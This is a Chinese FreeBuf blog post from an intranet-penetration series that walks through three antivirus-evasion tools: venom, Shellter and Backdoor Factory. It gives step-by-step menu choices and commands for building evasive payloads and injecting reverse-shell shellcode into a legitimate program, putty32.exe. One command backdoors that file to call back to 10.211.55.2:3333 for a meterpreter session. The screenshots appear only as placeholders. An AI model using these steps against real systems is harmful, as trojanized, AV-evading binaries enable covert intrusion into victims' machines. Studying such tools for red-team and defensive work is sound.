freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

99+
内网渗透 day11-免杀框架
彩虹猛犸233 2020-11-16 14:36:49 350774

免杀框架

1. venom框架

cd venom进入venom文件夹中./venom.sh进入venom框架中

选择2进入windows的payload模块

wps122

再次2选择dll的shell编码格式

wps123

输入要反弹到的ip地址

wps124

输入端口

wps125

选择payload

wps126

填写生成文件的文件名

wps127

选择文件后缀

wps128

选择下发方式

wps129

这里选择手动下放进行测试,将两个文件复制粘贴到靶机上

wps130

运行installer.bat,显示成功反弹meterpreter会话

wps131

选择8进入逃避恶意接口检测的payload

wps132

接着选择4选择返回meterpreter会话

wps133

wps134

wps135

将bat和ps1放到同一个文件夹下运行bat文件

wps136

成功反弹meterpreter会话

wps137

2. shelltel框架

windows下直接双击shellter.exe

wps138

A:自动选择shellcode

M:手动配置参数

H:help

选择A自动选择shellcode,N不检查当前版本

wps139

输入要注入的程序

wps140

首先会把pe文件备份到shellter-backups文件夹下,原本的文件被覆盖了。

wps141

是否启用隐藏模块(这里选择不启用N)

wps142

选择payload模块

wps143

输入ip和端口

wps144

双击被注入的程序程序

wps145

成功反弹会话

wps146

3. backdoor factory(BDP)

检测pe文件是否允许注入shellcode

wps147

./backdoor.py -f ../putty32.exe -S

-f:要注入的pe文件

-c:code cave(代码裂缝)

-l:代码裂缝⼤⼩

-s:选择使⽤ payload 类型

-S:检测pe文件是否支持注入shellcode

-H:选择回连服务器地址

-P:回连服务器端⼝

-J:使⽤多代码裂缝注⼊

探测可注入的裂缝大小

wps148

./backdoor.py -f ../putty32.exe -c -l 200

查看可用的payload

wps149

wps150

./backdoor.py -f ../putty32.exe -s show

生成免杀pe文件

wps151

./backdoor.py -f ../putty32.exe -s iat_reverse_tcp_stager_threaded -H 10.211.55.2 -P 3333 -J -o payload.exe

成功运行putty32并且反弹会话

wps152

wps153

# 内网渗透 # 免杀工具
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 彩虹猛犸233 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透测试
彩虹猛犸233 LV.1
这家伙太懒了,还未填写个人描述!
  • 16 文章数
  • 46 关注者
empire3.6.0版本在执行persistencemiscdebugger*模块时报错解决
2020-11-19
内网渗透 day15-empire提权和后门植入
2020-11-18
内网渗透 day14-empire基础命令的使用
2020-11-17
文章目录